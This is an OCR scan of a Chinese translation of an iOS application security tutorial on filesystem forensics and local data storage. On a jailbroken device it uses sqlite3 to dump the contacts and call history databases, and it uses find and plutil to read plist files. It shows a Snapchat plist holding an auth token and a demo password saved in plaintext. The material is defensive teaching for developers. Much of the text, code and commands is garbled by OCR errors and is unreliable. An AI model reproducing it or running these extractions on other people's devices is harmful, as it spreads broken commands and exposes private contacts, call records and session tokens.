ateek.searchingeyeggmail.com|4F538C6B-1167-493F-8840-482757CE5D66[|12289|||0|1|395321683|0 

sqlite> 


另 一 个 例子 是 联系 人 数据 库 ， 其 位 置 是 /var/mobile/Library/AddressBook 


Prateeks-iPad:- root# cd /var/mobile/Library/AddressBook 

Prateeks-iPod:/var/mobile/Library/AddressBook root# 15 

AddressBook.sqlitedb  AddressBook.sqglitedb-shm AddressBook.sqlitedb-wal  AddressBookImages.sqglitedb  AddressBooksqlitedb 
Prateeks-iPad:/var/mobile/Library/AddressBook root£ sqglite3 AddressBook.sqlitedb 

SQLite version 3.7.7 

Enter ".help" for instructions 

sqglite> .tables 


ABGroup ABPersonMultiValueDeletes 
ABGroupChanges ABPersonSearchKey 
ABGroupMembers ABPhoneLastFour 
ABMultiValue ABRecent 
ABMultiValueEntry ABStore 
ABMultiValueEntryKey FirstSortSectionCount 
ABMultiValueLabel FirstSortSectionCountTotal 
ABPerson LastSortSectionCount 
ABPersonBasicChanges LastSortSectionCountTotal 
ABPersonChanges  SgliteDatabaseProperties 
ABPersonLink 


-5IOQCE57C | 347 tps: //prateek. searchingey 
ne/ --Bü4gl-ed27428 
!.com:443/144 


earchingeye 
3U2ed224285—- 
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你 也 可 以 查看 电话 历史 记录 ， 位 于 /private/var/wireless/Library/CallHistory 


Prateeks-iPod:- root# cd /private/var/wireless/Library/CallHistory 
Prateeks-iPod:/private/var/wireless/Library/CallHistory root# ls 
call history.db 
Prateeks-iPod:/private/var/wireless/Library/CallHistory root£ sglite3 call history.db 
SüLite version 3.7.7 
Enter ".help" for instructions 
sqlite» .headers on 
sglite> .tables 
_S5qliteDatabaseProperties data 
call 
sglite> select x from call; 
ROWID | add |f lags | id |name | country_code |network_code 

1|-1||| 

I-1111 


用 命令 行 做 这 些 事情 确实 很 费时 间 。 一 个 更 好 的 分 析 方 法 就 是 导出 这 些 信 息 到 你 电脑 
然后 用 工具 打开 ) 。 例 如 ， 下 载 Address Book Sqlite database 


H iExplorer i [| Prateek's iPod. B Root >, var. [3 mobile ` [E Library ` 国 AddressBook 


Name File Type Size Date Modified 
.sglite history 74 B 27/11/12 4:45 PM 
+ Applications 16/07/13 4:40 PM 
» | Documents 16/07/13 3:14 PM 
v (Library 16/07/13 5:02 PM 
.localized 30/08/11 9:02 AM 
» | gd Accounts 02/11/12 3:25 PM 
v Ln AddressBook 1.9 MB 17/07/13 12:29 PM 






| AddressBook,s7litadh CF FTETIB 





17/07/13 3:56 AM 


AddressBook.s OPen 880 M 32 kB 18/07/13 3:47 PM 
AddressBooks Quick Look AL 24 kB 17/07/13 6:41 PM 

rf AddressBookln Refresh ER 1.5 MB 15/07/13 9:40 PM 
AddressBooks Add Bookmark geD 16/10/12 11:39 PM 

» LJAgaregateDictior 18/07/13 4:41 PM 
» ÜH AppCake2 Paste HP 03/06/13 11:40 PM 
Application Delete 32 «x] 12/07/13 5:37 PM 

e Application Supp 31/12/12 4:33 PM 
» D Applicationsyne New Folder THEN 16/07/13 4:40 PM 
» (Assets Add Files... CRA 07/01/12 1:11 PM 
» | BulletinBoard Export to Folder... 38E 17/07/13 6:40 PM 
» (Caches 18/07/13 3:51 PM 
» (Calendar Mount as Disk 18/07/13 4:09 PM 
» |g ConfigurationProfiles | 28/05/13 1:10 AM 
» (gg Cookies 17/07/13 10:59 PM 
» (ig DataAccess 17/07/13 3:56 AM 
+ (i FairPlay 07/01/12 2:27 PM 
» l FlurryFiles 05/07/13 2:57 PM 
+ LgGameKit 07/01/12 12:47 PM 
» Lginboxes 16/09/11 12:28 PM 
» | Keyboard 09/07/13 7:11 PM 
» Logs 16/07/13 1:17 PM 
» Mail 18/07/13 4:10 PM 
+ Maps 01/02/13 2:47 PM 


» D MediaStream 17/03/12 10:07 AM 


我 们 可 以 用 GUI Sqlite 客 户 端 工具 来 分 析 这 个 文件 。 我 这 里 用 的 是 MesaSQLite。 免 费 且 多 
用 。 在 MesaSQLite 中 ， 先 到 File， 然 后 点 击 Open Database > Ze d£db 3c fF > A% f& Content 
tab， 选 择 一 个 表 然 后 点 击 查看 所 有 (Show All) 


| eoo Macintosh HD:Users:prateekgianchandani:Desktop:AddressBook.salitedb 


lH lw HE 


























AddressBook.sqlitedb | EH ^ z 

| Database Views SOL Query Structure Triggers AutoCommit BEGIN ROLLBACK COMMIT 

| ABPerson * | B 

| ROWID =| [ = a] oe (=) (+) 
ORDER BY | : | | Show all | 
4/ Use Search Params Limit returned rows: Starting at: | | Last500 | 
ROWID First Last Middle FirstPhonetic MiddlePhonetic LastPhone 

j 
| 5 
l 3 Prateek 
' 
I 
i 
i 
l 
j 
in 
| 
ill 
il 
j 
I 
上 
i 
I 
i 
1 
I 
I 
Select * fro! 

(5 | Row ' UTS +) BB M ü ft Hb l+ -|+ 
| Version: 4.0.8 Demo Mode: 30 days remaining 





如 你 所 见 ， 许 多 信息 都 可 以 从 这 些 数 据 库 文件 中 获取 。 我 推荐 你 自己 去 探索 下 ， 找 找 其 他 应 
用 其 至 操作 系统 的 数据 库 文件 看 看 。 


从 plist 文 件 中 获取 信忠 


plist 是 用 户 存 放 许 多 不 Maced 的 结构 化 文本 文件 。 因 为 这 些 信息 都 是 以 key-value 这 种 
键 值 对 来 存放 信息 的 ， 所 以 要 改变 这 些 信息 非 第 容易 。 因 此 ， 许 多 开发 者 有 时 会 在 这 些 文件 
中 存放 许多 不 该 存放 在 这 的 信息 。 


即使 在 一 个 没有 越狱 的 设备 上 ，plist 文 件 也 可 以 通过 工具 iExplorer 获 取 。 你 可 以 用 iExlorer 看 
看 plist 文 件 。 例 如 如 下 图 是 一 个 Defcon iOS 应 用 的 plist 中 存放 的 信息 。 


30 iExplorer za 
> | [zw aa LUN | © | | % | Q Search Folder 




















ack View Mode i — . Quick Look Action — — - 3 smi — Search 
iExplorer W Prateek's iPodi j ResourceRules.plist Open with Xcode5-DP2 ^ : 
B p E 'ceRules.plist 
+ <?xml version="1.0" encoding-' 'UTF-8"?» 
DC Current.png <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"» 
DC DIAL. ICON.png «plist version="1.0"> 
= = x «dict» 
DC DISC ICON.png <key>rules</key> 
DC_Headphone.png <dict> 


<key>.*</key> 





DC_KEY.png <true/> 
2 <key>Info.plist</key> 
= DC Negative.png «dict» 
DC Personal.png <key>omit</key> 
^ - «true/» 
DC Positive.png <key>weight</key> 
DC_SMILE_ICON.png <real>10</real> 
</dict> 
DC_Speaker.png <key>ResourceRules. plist</key> 
DC_microphone.png <dict> 
<key>omit</key> 
Defcon <true/> 
Defcon.sqlite <key>weight</key> 
rz <real>100</real> 
&&]Icon.png </dict> 
Info.plist <key>*SC_Info/.*\.sinf$</key> 
<dict> 
= MainWindow.nib <key>omit</key> 
PkgInfo <true/> 
Prateek’ <key>we ight</key> 
A ResnurroRulac nlicr <integer>10000</integer> 
= /dict> 
Prateek's iPhone > SC Open 360 i ^ 
: ey>*SC_Info/.*\.suppS</key> 
Quick Look eee 
Prateek's iPad <key>omit</key> 
Refresh dR <true/> 
ea 二 blul Add Bookmark 38D pri rea oi 
— <integer>10000</integer> 
Prateek's iPod - dc- </dict> 
def, Paste P gict> 
Dden Delete 8e QJ 
dist 
jsp New Folder THN 
Esp: Add Files... CEA 
S109 Export to Folder... E 
whi 
4 xpk Mount as Disk 
> (Documents 7 
> (ilLibrary 





下 图 是 Snapchat 应 用 的 Documents 目 录 中 保存 的 plist 文 件 截 图 。 第 一 个 高 亮 的 区 块 实际 上 是 
特定 用 户 的 认证 标识 (authentication token)， 第 二 个 高 亮 的 区 块 是 Snapchat 的 用 户 名 称 。 


</dict> 
<dict> 
<key>NS.string=/key> 
«string-474b8T48-1744-48b8-B6c3-7bba7tfd4T3eacs/string- 
«dicte 
«dict» 
zkeysNS.stringe/keys 
«string-53FCC1ESABECBDCA37169297E8Z2CEBOEBTADE7AEDBD5BB68C34185C61DCEBB2884«/strinag- 
</dict> 
«dict» 
zkey2NS.objectsce/key- 
<array/> 
</dict> 
<dict/> 
<dict> 
<keyeNS. string</key> 
<String>2488/763 7401806522 1r</string> 
z/dict- 
«dict» 
<keyoS.string=/key> 
<string=gotttagf</string> 
</dict> 
«dict» 


Plist XAF "T 86 LSB ie RS ^ Hd TIPS e RA oe AS Sl RF HER SUE ELTA 
都 可 以 从 设备 中 寻 出 plist 文 件 ， 即 使 这 个 设备 没有 越狱 。 你 也 可 以 从 用 户 的 iTunes 备份 中 导 
Hk plist to LARA HARARE GME plist HP > Ke KEAN IK o 
Linkedin iOS 应 用 被 发 现 的 一 个 漏洞 就 是 它 把 用 户 的 认证 信息 存放 在 plist 文 件 中 ， 你 可 以 到 这 
找到 更 多 信息 。 


如 果 你 想 在 terminal 看 这 些 plist 文 件 ， 你 可 以 先 用 工具 plutil 把 它 转化 为 xml 格 式 ， 命 令 是 plutil - 
covert xml1 [filename] » 首先 用 下 面 的 2 个 命令 找到 设备 上 所 有 的 plist 文 件 。 





Prateeks-iPod:/var/mobile root£ cd / 
Prateeks-iPod:/ root# find * . -name *. plisti 


然后 把 它 转 成 Xml 格式 


Prateeks-iPod:/ root£ plutil -convert xmll System/Library/Backup/Domains.plist 
Converted 1 files to XML format 
Prateeks-iPod:/ root# E 


现在 文件 是 结构 化 的 格式 了 ， 我 们 可 以 用 vim 打 开 它 。 





四 ?xm1 versionz"1.8" encoding="UTF-B" F> 

<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.8//EN" “http: //www.apple.com/DT0s/PropertyList—1.0.dtd"> 
plist version="1.8"> 

dict» 


<key>MaxSupportedVersion<=/key> 
zstring-13.B8e/string» 
ekeysMin*supportedVersione/key- 
«string-3.Be/string- 
ekey-5ystemDomainse/key- 
dict» 
zkey-BaooksDomainz/key- 
edict- 
zkeysRelativePathAggregateDictionaryGroupse/key- 
«dicte 
<key></key> 
<string=books</string> 
</dict> 
zkeyszRelativePathsMatToBackupe/key- 
«array/2 
zkey-RelativePathsMotToBackupTaDrivee/key- 
“array> 
«string-£ don't remove items not restored</string> 
</array> 


m 1 mee à mm RN a= am" m 


如 你 所 见 ， 我 们 现在 能 够 分 析 plist 文 件 的 内 容 。 


T 
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在 本 文中 ， 我 们 查看 了 iOS 的 文件 系统 ， 学 习 到 其 目录 结果 是 如 何 组 织 的 ， 查 看 了 一 些 重要 文 
件 ， 并 且 学 习 了 如 何 从 数据 库 和 plist 文 件 中 导出 重要 数据 。 


本 文 原文 是 IOS Application Security Part 10 — IOS Filesystem and Forensics 


#5 iOS 应 用 静态 分 析 下 的 更 多 文章 


本 文 我 们 将 看 看 应 用 在 本 地 存储 数据 有 哪些 方法 以 及 这 些 不 同方 法 的 安全 性 


我 们 将 会 在 一 个 demo 上 这 些 这 些 ^ 试 ， 你 可 以 从 github 上 下 载 这 个 例子 程序 。 对 于 CoreData 
的 例子 ， 你 可 以 从 这 下 载 例子 o 本 例 有 一 个 不 同 点 就 是 我 们 将 会 在 模拟 器 上 运行 这 些 应 
用 ， 而 不 是 在 设备 上 运行 enn 目的 是 为 em 的 操作 都 可 以 通过 Xcode 来 
把 这 些 应 用 运行 在 模拟 器 上 。 当 然 ， 你 也 可 以 把 这 应 用 安装 到 设备 上 。 


NSUserDefaults 


保存 用 户 信 息 和 属性 的 一 个 非常 普通 的 方法 就 是 使 用 NSUserDefaults。 保 存在 
NSUserDefaults 中 的 信息 在 你 的 应 用 关闭 后 再 次 打开 之 后 依然 存在 。 保 存 信 息 到 
NSUserDefaults 的 一 个 例子 就 是 保存 用 户 是 否 已 登录 的 状态 。 我 们 把 用 户 的 登录 状态 保存 到 
NSUserDefaults 以 便 用 户 关 闭 应 用 再 次 打开 应 用 的 时 候 ， 应 用 能 够 从 NSUserDefaults 获 取 数 
据 ， 根 据 用 户 是 否 登 录 展 示 不 同 的 界面 。 有 些 应 用 也 用 这 个 功能 来 保存 机 密 数 据 ， 比 如 用 户 
的 访问 令 牌 ， 以 便 下 次 应 用 登录 的 时 候 ， 它 们 能 够 使 用 这 个 令 牌 来 再 次 认证 用 户 。 


从 github 可 以 下 载 例 子 应 用 ， 运 行 起 来 。 你 可 以 得 到 下 面 的 界面 ， 现 在 输入 一 些 信息 到 与 
NSUserDefaults 相 关 的 文本 框 ， 然 后 点 击 下 面 的 “Save in NSUserDefaults”。 这 样 数 据 就 保存 
到 NSUserDefaults f ° 
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许多 人 不 知道 的 是 保存 到 NSUserDefaults 的 数据 并 没有 加 密 ， 因 此 可 以 很 容易 的 从 应 用 的 包 
中 看 到 。NSUserDefaults 被 存在 一 个 以 应 用 的 bundle id 为 名 称 的 plist 文 件 中 。 首先 ， 我 们 需 
要 找到 我 们 应 用 的 bundle id。 因 为 我 们 在 模拟 器 上 运行 ， 我 们 可 以 

在 /Users/$username/Library/Application Support/iPhone Simulator/$ios version of 
simulator/Applications/4X $] E Ff] » dx 3x AY Xe 42 

x : "Users/prateekgianchandani/Library/Application Support/iPhone 
oimulator/6.1/Applications" » 


一 旦 我 们 找到 那个 目录 ， 我 们 可 以 看 到 一 堆 应 用 。 我 们 可 以 用 最 近 修 改 的 日 期 找到 我 们 的 应 
用 ， 因 为 它 是 最 近 修 改 的 。 
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PT m á——— Date Modified Size Kind 


.DS Store Today 6:43 PM 15 KB Document 





b [ 26A7DBA1-13DF-4874-AE01-63C0C2BA5996 Today 6:03 PM == Falder 
b [ 41FE9E3E-AOEB-49EA-843B-7DE13013102B 29-5ep-2013 9:02 PM =e Folder 
# [ 3131CAFO0-8EB8-4EDB-8870-BC9861C00564 01-Oct-2013 2:47 PM -- Folder 
* [3 14285228-7627-497C-8FBF-6D8COFEFOCFO 25-5ep-2013 6:15 PM -= Folder 
* [d A83595C4-92FC-4138-99C6-43815E1F77E0 29-5ep-2013 10:47 PM == Folder 
M fm AC399447-COF0-473F-9469-426715C34A92 Today 6:07 PM Folder 
b (D B26F2726-C608-4217-BF01-05B977B4473F 29-Sep-2013 11:12 PM = Folder 
> [ B27FC6BC-B8CDF-4323-BCG6E-FF3AFCF8BB3B 29-Sep-2013 11:12 PM Es Folder 
Eb [ BE3CBFA2-586D-4A99-8764-152DFE97EF26 29-Sep-2013 10:47 PM == Folder 
b Lu C7484357-2583-41F1-88B1-7E4E91CB395E 04-Oct-2013 2:04 AM =m Folder 
* [y CB632019-A9AE-4849-B6F6-713124C41D59 03-Oct-2013 11:31 PM = Folder 


进入 到 应 用 的 bundle 里 面 。 通 过 NSUserDefaults 保 存 的 数据 都 可 以 在 如 下 图 所 示 的 Library -> 
Preferences -> $AppBundleld.plist 文 件 中 找到 。 





.DS Store .D5 Store a | .GlobalPreferences.plist 
= Documents H [we Caches Ls Hdl com.apple.PeoplePicker.plist 
国 Library + | | Preferences d B com.highaltitudehacks.LocalDataStorageDemo.plist 
^4 LocalDataStorageDemoa 
E tmp t 


打开 这 个 plist 文 件 ， 我 们 可 以 清楚 的 看 到 这 个 文件 的 内 容 。 


eoo | | com.highaltitudehacks.LocalDataStorageDemo.plist e 


w | ad P | | | com.highaltitudehacks.LocalDataStorageDemo.plist » No Selection 
Key | Type Value 
Y Root Dictionary (1 item) 
DemoValue String ConfidentialData 


有 时 候 ，plist 文 件 会 以 二 进 制 格式 保存 ， 因 此 可 能 第 一 下 看 到 会 觉得 不 可 读 。 你 可 以 用 plutil 工 
具 把 它 转 成 Xml 格式 ， 或 者 直接 用 iExplorer 在 设备 上 查看 。 


Plist 文件 


另 一 种 保存 数据 普遍 用 的 方法 就 是 plist 文 件 。Plist 文 件 应 该 始终 被 用 来 保存 那些 非 机 密 的 文 
件 ， 因 为 它们 没有 加 密 ， 因 此 即使 在 非 越狱 的 设备 上 也 非常 容易 被 获取 。 已 经 有 漏洞 被 爆 出 
来 ， 大 公司 把 机 完 数 据 比 如 访问 令 牌 ， 用 户 名 和 密码 保存 到 plist 文 件 中 。 在 下 面 的 demo 中 ， 
我 们 输入 一 些 信息 并 保存 到 plist 文 件 。 
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Save in NSUserDefaults 


Save in Keychain 


testuser 


abcdef1234 


Save in Plist file 


Q\we|R Tlyu top 
A|s|pjrjeH]s Kit. 
Ez |xic|v|BiNI ME 
.2123 return 


下 面 是 把 数据 保存 到 plist 文 件 的 代码 。 


[plain] 

NSArray *paths - NSSearchPathForDirectoriesInDomains(NSDocumentDirectory,NSUserDomainMask 
NSString *documentsDirectory - [paths objectAtIndex:0]; 

NSString *filePath = [documentsDirectory stringByAppendingString:Q"/userInfo.plist"]; 
NSMutableDictionary* plist - [[NSMutableDictionary alloc] init]; 

[plist setValue:self.usernameTextField.text forKey:Q'username"]; 

[plist setValue:self.passwordTextField.text forKey:Q'passwprd" |; 

[plist writeToFile:filePath atomically:YES]; 

[/plain] 


E) 


如 你 所 见 ， 我 们 能 够 给 plist 文 件 指 定 路 径 。 我 们 可 以 搜索 整个 应 用 的 所 有 plist 文 件 。 在 这 里 ， 
我 们 找到 一 个 叫做 Userinfo.plist 的 文件 。 





.D5 Store .D5 Store B userInfo.plist 
26A7DBAl-..0C2BA5996  - Mr aCe 
41FE9E3E-A...13013102B * [| Library P 
S313 1CAFO-...9861C00564 ^ © LocalDataStorageDemoa 
14285228-...8COFEFOCFO © [.] tmp F 
AB3595C4-...815EIF77E0 * 

AC399447-..715C34A92 > 

B26F2725-..B977B4473F P 

B27FCOBC-...3AFCFBBB3B P 

BE3CBFA2-..2DFE97EF26 P 

C7484357-..4E91CB395E P 

CB632019-..124C41D59 > 





EEEEEEEEEEEH 


可 以 看 到 ， 它 包含 了 我 们 刚刚 输入 的 用 户 名 /密码 的 组 合 。 


eoo |. | userinfo.plist "s 


am | A Pj I] userlnfo.plist > No Selection 





Key Type Value 
¥ Information Property List Dictionary (2 items) 
passwprd Og String abcdef1234 
username String testuser 


CoreData 和 Sqlite 文 件 


Oo 


为 CoreData 内 部 使 用 Sqlite 来 保存 信息 ， 因 此 我 们 这 里 将 只 会 介绍 下 CoreData。 如 果 你 不 
知道 什么 是 CoreData， 下 面 是 从 羊 果 文档 介绍 CoreData 截 的 图 


Core Data Features 


features include: 


* Change tracking and undo support. 


Core Data provides built-in management of undo and redo beyond basic text editing. 


Relationship maintenance. 


Core Data manages change propagation, including maintaining the consistency of relationships among objects. 


Futures (faulting). 
Core Data can reduce the memory overhead of your program by lazily loading objects. It also supports partially materialized futures, and copy-on-write data sharing. 
+ Automatic validation of property values. 


Core Data's managed objects extend the standard key-value coding validation methods that ensure that individual values lie within acceptable ranges so that combinations of 
values make sense. 


* Schema migration. 


Dealing with a change to your application's schema can be difficult, in terms of both development effort and runtime resources. Core Data's schema migration tools simplify the 
task of coping with schema changes, and in some cases allow you to perform extremely efficient in-place schema migration. 


* Optional integration with the application's controller layer to support user interface synchronization. 
Core Data provides the NSFetchedResultsController object on iOS, and integrates with Cocoa Bindings on OS X. 
* Full, automatic, support for key-value coding and key-value observing. 


In addition to synthesizing key-value coding and key-value observing compliant accessor methods for attributes, Core Data synthesizes the appropriate collection accessors for to- 
many relationships. 


* Grouping, filtering, and organizing data in memory and in the user interface. 


* Automatic support for storing objects in external data repositories. 


« Sophisticated query compilation. 


Instead of writing SQL, you can create complex queries by associating an NSPredicate object with a fetch request. NSPredicate provides support for basic functions, correlated 
subqueries, and other advanced SQL. With Core Data, it also supports proper Unicode, locale-aware searching, sorting, and regular expressions. 


* Merge policies. 


Core Data provides built in version tracking and optimistic locking to support automatic multi-writer conflict resolution. 


因此 ， 基 本 上 ，CoreData 可 以 用 来 创建 一 个 model， 管 理 不 同 对 月 的 关系 ， 把 数据 保存 到 本 
地 ， 然 后 当 你 查询 的 时 候 从 本 地 缓存 中 获取 它们 。 本 例 中 ， 我 们 将 使 用 一 个 demo， 位 于 
github。 运 行 起 来 ， 你 会 发 现 它 只 是 一 个 简单 的 RSS feed 。 
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Apple iPads earn the “most... 


Apple reportedly expanding... 


DogVacay raises $15M to bui... 
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这 个 应 用 用 CoreData 保 存 数 据 。 一 个 非常 重要 的 一 点 就 是 CoreData 内 部 使 用 sql， 因 此 所 有 文 
件 都 以 .db 文件 保存 。 我 们 到 这 个 app 的 bundle 中 去 看 看 。 在 这 个 app 的 bundle 中 ， 你 可 以 看 
到 那里 有 一 个 MyCoreData.sqlite 的 文件 。 





DS Store DS Store DS Store DS Store MyCoreData. sqlite 
@ 5.0 CJ Applications > LJ 41FE9E3bE-A..130131000 » PT 
Nl 5.1 iJ Library L | 313 1CAFO-...9861C00564 (C Library 
ay 6.0 LL] Media LJ 52552E68-...2BCA17B14A MyCoreData 
lu] 6.1 > |) Root LJ 14285228-...8COFEFOCFO ix tmp 
al 7.0 ix] tmp (.] 51038055-...0BF12C7E9D » 
LJ Applications LJ A83595C4-...815E1F77E0 
L | Containers L | AC399447-...715C34A92 
L Documents LJ B26F2726-...B977B4473F 
iJ Library LJ B27FC6BC-...3AFCF8BB3B 
LJ Media LJ BE3CS8FA2-...2DFE97EF26 
ix] Root LJ C7484357-...4E91CB395E 
i tmp LJ CB632019-...124C41D59 
ix] User 


我 们 可 以 用 sglite3 分 析 。 我 这 slite 文 件 的 地 址 是 : ~/Library/Application Support/iPhone 
Simulator/6.1/Applications/51038055-3CEC-4D90-98B8-A70BF12C7E9D/Documents. 


MyCoreData. sqlite 
SQLite version 3.7.12 2012-04-03 19:43:07 
Enter ".help" for instructions 


Enter SQL statements terminated with a ";" 
sqglite» .tables 

ZSTORIES 2 METADATA Z_PRIMARYKEY 
sqlite fj 





我 们 可 以 看 到 ， 这 里 有 个 叫做 ZSTORIES 的 表 。 在 Core Data 中 ， 每 个 表 名 开头 都 会 被 追加 一 
个 Z。 这 意味 着 在 正 的 实体 名 称 是 STORIES， 如 我 们 在 工程 的 源码 文件 看 到 的 那样 。 

















he | | MyCoreData ) | |Resources ' |17] MyCoreData.xcdatamodeld > | e, MyCoreData.xcdatamadel ; 回 Stories 
EE || * Attributes 
—— B Type 
FETCH REQUESTS Ee n. : 
in tring z 
CONFIGURATIONS E summary String = 
(8 Default [2] timeStamp Date = 
图 title string 下 
中 — | 
* Relationships 
| Relationship. à Destination Inverse 
中 
* Fetched Properties 
Fetched Property à Predicate 


我 们 可 以 非常 容易 的 导出 这 个 表 的 所 有 值 。 请 却 表 headers 的 状态 是 on © 


sqlite» .headers on 

xi ediselect * from ZSTORIESP 

Z_PKIZ_ENTIZ_OPTIZTIMESTAMP1ZDATE1ZLINKIZSUMMARY1ZTITLE 

111111403390978.8709691Fri，11 Oct 2013 19:00:16 +0000 
| Ihttp://feedproxy.google.com/-r/TheAppleBlog/-3/. 6WkV1NySuU/ 

|In a world where an endless runner meets up with a puzzle game, you find that your imaginative use of colors will paint your path 

| to freedom.«img alt="" border="@" srce"http://stats.wordpress.com/b.gif?hostegigaom. com&#038 ; blog=14960843&#038 ; post=700329&#038 ; subd=gi gaom2&#03 

8; ref=&#038;feed=1" width="1" height="1" /> 

IGames for the weekend: Nihilumbra 


211111403390978 .996537IFri, 11 Oct 2013 17:55:27 +0000 
Ihttp://feedproxy. google.com/-r/TheAppleBlog/-3/18jvt4uuQn0/ 
| IWant to see what the stars are watching on YouTube? Celebrity Tweet TV turns all of their shared videos into a TV channel.<img al 
te"" borderz"Q" srcs"http://stats.wordpress.com/b.gi f ?hostegigaom. com&#038 ;blog=14960843&#038 ; post- 70395384038 ; subd=gi gaom2&#038 ; ref 284038 ; feed=1" 
width="1" height="1" /> 
|New 10S app turns Kim Kardashian’s tweets into a TV channel 


3/1/1/403390979.001505|Fri, 11 Oct 2013 13:50:05 +0000 

Ihttp://feedproxy. google.com/-r/TheAppleBlog/-3/Q0T-zQcwKFPM/ 

lAccording to a new study, app crashes could be twice as common on the iPhone 5s compared to the iPhone 5 and iPhone 5c.«img alt=" 
" borderz"Q" src="http://stats.wordpress.com/b.gif7?host=gigaom. com&#038 ;b10g-14960843&4038 ; post- 703824855038 ; subd-gi gaom2&#038 ; ref=&#038;feed=1" wi 
dth="1" height="1" /> 


IStudy shows apps are twice as likely to crash on the iPhone 5s 


4|1/1/403390979.006004|Fri, 11 Oct 2013 13:33:49 +0000 

Ihttp://feedproxy.google.com/-r/TheAppleBlog/-3/Cvxj5XvetC8/ 

IIf you're looking to buy an iPhone, now's a good time: Best Buy is offering $100 off an iPhone 5c or an iPhone 5s for trading in 
your old smartphone.<img alt="" border-s"Q" src="http://stats.wordpress.com/b.gif?host=gigaom. com&4038;b109g-1496084384038 ; post- 70380684038 ; subd=gig 
aomZ2&#038 ; ref=&#O38;feed=1" width="1" height="1" /> 

IBest Buy offering free iPhone 5c, $100 iPhone 5s for trading in your old smartphone 





5/1/1/403390979.009793| Thu, 10 Oct 2013 19:44:57 +0000 


正如 我 们 看 到 的 那样 ， 默 认 的 ， 保 存在 CoreData 的 数据 都 是 没有 加 蜜 的 ， 因 此 可 以 轻易 的 被 
取出 。 因 此 ， 我 们 不 应 该 用 CoreData 保 存 机 名 数据 。 有 些 库 包装 了 一 下 CoreData, 声称 能 够 
保 行 加 获 数据 。 也 有 些 库 能 够 把 数据 加 窖 保存 到 设备 上 ， 不 过 不 使 用 CoreData。 例 如 ， 
Salesforce Mobile SDK 就 使 用 了 一 个 被 称 为 SmartStore 的 功能 来 把 加 冤 数 据 以 "Soups" 的 形 
式 保 存 到 设备 上 。 


Keychain 


有 些 开 发 者 不 太 意 欢 把 数据 保存 到 Keychain 中 ， 因 为 实现 起 来 不 那么 直观 。 不 过 ， 把 信息 保 
和 存 到 Keychain 中 可 能 是 非 越狱 设备 上 了 最 安全 的 一 种 保存 数据 的 方式 了 。 而 在 越狱 设备 上 ， 没 
有 任何 事情 是 安全 的 。 这 篇 文章 展示 了 使 用 一 个 简单 的 wrapper 类 ， 把 数据 保存 到 keychain 有 是 
多 么 的 简单 。 使 用 这 个 wrapper 来 保存 数据 到 keychain 就 像 把 数据 保存 到 NSUserDefaults 那 么 
简单 。 下 面 就 是 一 段 把 字符 串 保 存 到 keychain 的 代码 。 请 注意 和 使 用 NSUserDefaults 的 语法 
非常 类 似 。 


[plain] 

PDKeychainBindings *bindings - [PDKeychainBindings sharedKeychainBindings]; 
[bindings setObject:@"XYZ" forkey:@"authToken" ]; 

[/plain] 

下 面 是 一 段 从 Keychain 中 取 数 据 的 代码 。 


[plain] 

PDKeychainBindings *bindings - [PDKeychainBindings sharedKeychainBindings]; 
NSLog(@"Auth token is %@", [bindings objectForKey:@"authToken"]]); 

[/plain] 


一 些小 技巧 


正如 之 前 讨论 过 的 那样 ， 没 有 任何 信息 在 越狱 设备 上 是 安全 的 。 攻 击 者 能 够 拿 到 Plist 文 件 ， 寻 
出 整个 Keychain， 逢 换 方 法 实现 ， 并 且 攻 击 者 能 做 他 想 做 的 任何 事情 。 不 过 开发 者 能 够 使 用 
一 些小 技巧 来 使 得 脚本 小 子 从 应 用 获得 信息 变 得 更 难 。 比 如 把 文件 加 密 放 到 本 地 设备 上 。 这 
里 这 篇 文章 详细 的 讨论 了 这 一 点 。 或 者 你 可 以 使 得 攻击 者 更 难 理解 你 的 信息 。 比 如 考虑 要 把 
A MH P SESS (authentication token) 保存 到 keychain 当 中 ， 脚 本 小 子 可 能 就 会 导出 
keychain 中 的 这 个 数据 ， 然 后 试图 动 持 用 户 的 会 话 。 我 们 只 需 再 把 这 个 认证 令 牌 字符 串 反 和 转 
一 下 (reverse) ， 然 后 再 保存 到 keychain 中 ， 那 么 攻击 者 就 不 太 可 能 会 知道 认证 令 牌 是 反 转 
保存 的 。 当 然 ， 攻 击 者 可 以 追踪 你 的 应 用 的 每 一 个 调用 ， 然 后 理解 到 这 一 点 ， 但 是 ， 一 个 如 
此 简单 的 技术 就 能 够 让 脚本 小 子 猜 足 够 的 时 间 ， 以 至 于 他 们 会 开始 寻找 其 它 应 用 的 汤 洞 。 另 
一 个 简单 技巧 就 是 在 每 个 真正 的 值 保存 之 前 都 追加 一 个 常量 字符 串 。 


AX X IOS Application Security Part 20 — Local Data Storage (NSUserDefaults, 
CoreData, Sqlite, Plist files) 


#5 iOS 应 用 静态 分 析 下 的 更 多 文章 


Keychain 基础 


根据 羊 果 的 介绍 ，iOS 设 备 中 的 Keychain 是 一 个 安全 的 存储 容器 ， 可 以 用 来 为 不 同 应 用 保存 敏 
感 信 息 比 如 用 户 名 ， 密 码 ， 网 络 密码 ， 认 证 令 牌 。 革 果 自 己 用 keychain 来 保存 Wi-Fi 网 络 密 
码 ，VPN 和 凭证 等 等 。 它 是 一 个 sqlite 数 据 库 ， 位 于 /private/varKeychains/keychain-2.db， 其 保 
疮 的 所 有 数据 都 是 加 密 过 的 。 


开发 者 通常 会 希望 能 够 利用 操作 系统 提供 的 功能 来 保存 和 任 证 (credentials) 而 不 是 把 它们 (A 
证 ) 保存 到 NSUserDefaults,plist 文 件 等 地 方 。 保 存 这 些 数据 的 原因 是 开发 者 不 想 用 户 每 次 都 
要 登录 ， 因 此 会 把 认证 信息 保存 到 设备 上 的 菜 个 地 方 并 且 在 用 户 再 次 打开 应 用 的 时 候 用 这 些 
数据 自动 登录 。Keychain 的 信息 是 存在 于 每 个 应 用 (app) 8b mme 


过 keychain access groups 可 以 在 应 用 之 间 共 至 keychain 中 的 数据 。 要 求 在 保存 数据 到 
ee 时 候 指定 group。 把 数据 保存 到 keychain 的 最 好 方法 就 是 用 苹果 提供 的 
KeychainltemWrapper。 可 以 到 这 下 载 例 子 工程 。 第 一 步 就 是 创建 这 个 类 的 实例 。 


KeychainltemWrapper *wrapper = [[KeychainltemWrapper alloc] 
initWithldentifier:( Password" accessGroup:nil]; 


标识 符 (Identifier) 在 后 面 我 们 要 从 keychain 中 取 数 据 的 时 候 会 用 到 。 如 果 你 想 要 在 应 用 之 间 
